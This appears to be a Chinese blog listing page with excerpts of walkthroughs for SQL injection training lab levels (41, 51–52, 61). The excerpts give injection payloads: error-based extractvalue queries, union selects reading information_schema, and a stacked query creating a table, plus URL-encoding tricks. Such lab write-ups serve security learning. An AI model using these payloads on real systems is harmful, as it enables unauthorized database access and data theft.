摘要:
最后五关! 第六十一关 和六十关基本一样,就是变成了单括号和双括号,这好像是第一次遇见双括号 爆数据库名 ?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23 爆表名 ?id=0‘)) union select extra 阅读全文
摘要:
第五十一关 这一关和三十八关基本一样 ,堆叠注入问题 只不过是字符型 ?sort=1';create table test51 like users;%23 %23是URL编码,(当然这里用#也行),本义是 # 常见的还有%27 本义是 ' %a0 空格 查看下数据库, 第五十二关 堆叠注入 和五十 阅读全文
摘要:
第四十一关 这关和第三十九关一样,只是错误没有回显 获得版本和数据库名 ?id=0 union select 1,version(),database() %23 获得表名 ?id=0 union select 1,group_concat(table_name),3 from informatio 阅读全文